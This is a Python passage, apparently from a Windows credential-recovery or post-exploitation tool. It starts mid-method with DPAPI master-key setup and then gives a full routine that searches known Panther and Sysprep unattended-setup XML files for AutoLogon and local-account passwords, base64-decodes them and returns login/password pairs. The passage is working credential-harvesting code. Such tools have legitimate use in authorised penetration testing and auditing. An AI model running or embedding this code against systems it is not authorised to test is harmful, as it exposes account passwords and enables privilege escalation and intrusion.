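							if os.path.exists(masterkeydir):
								self.smkp = masterkey.MasterKeyPool()
								self.smkp.loadDirectory(masterkeydir)
								self.smkp.addSystemCredential(dpapi_system)
								self.smkp.try_credential_hash(None, None)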
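    def run(self, software_name=None):
        """Read account passwords left in Windows unattended-setup answer files.

        A fixed list of ``Unattend*.xml`` locations below the Windows directory
        is checked. In each file found, the ``AutoLogon`` block and every
        ``UserAccounts/LocalAccounts/LocalAccount`` of the first ``component``
        of each ``settings`` element are read; the password text goes through
        ``self.try_b64_decode``.

        Returns the list of dicts ('Login', 'Password'), or ``None`` when
        ``build_path`` gives no path.
        """
        windir = build_path(software_name)
        if windir:
            # Raw strings: the backslashes are path separators. Without the
            # prefix, '\U' and '\u' are read as escape sequences by Python 3
            # and the literals do not even compile there.
            files = [
                r'Panther\Unattend.xml', r'Panther\Unattended.xml',
                r'Panther\Unattend\Unattended.xml',
                r'Panther\Unattend\Unattend.xml',
                r'System32\Sysprep\unattend.xml',
                r'System32\Sysprep\Panther\unattend.xml'
            ]

            pwdFound = []
            xmlns = '{urn:schemas-microsoft-com:unattend}'

            def _add_account(username, password):
                # Record one account when both elements exist and the password
                # has not been scrubbed.
                if username is None or password is None:
                    return
                # An element without text gives None; calling .lower() on it
                # raised AttributeError and aborted the whole run.
                if password.text is None:
                    return
                # Remove false positive (with following message on password => *SENSITIVE*DATA*DELETED*)
                if 'deleted' not in password.text.lower():
                    pwdFound.append({
                        'Login': username.text,
                        'Password': self.try_b64_decode(password.text)
                    })

            for relative_path in files:
                path = os.path.join(windir, unicode(relative_path))
                if not os.path.exists(path):
                    continue

                print_debug('INFO', u'Unattended file found: %s' % path)
                root = ET.ElementTree(file=path).getroot()

                for setting in root.findall('%ssettings' % xmlns):
                    component = setting.find('%scomponent' % xmlns)
                    # A settings element without a component gave None here and
                    # the lookups below raised AttributeError.
                    if component is None:
                        continue

                    autoLogon = component.find('%sAutoLogon' % xmlns)
                    if autoLogon is not None:
                        _add_account(
                            autoLogon.find('%sUsername' % xmlns),
                            autoLogon.find('%sPassword' % xmlns))

                    userAccounts = component.find('%sUserAccounts' % xmlns)
                    if userAccounts is None:
                        continue
                    localAccounts = userAccounts.find('%sLocalAccounts' % xmlns)
                    if localAccounts is None:
                        continue
                    for localAccount in localAccounts.findall(
                            '%sLocalAccount' % xmlns):
                        _add_account(
                            localAccount.find('%sName' % xmlns),
                            localAccount.find('%sPassword' % xmlns))

            return pwdFound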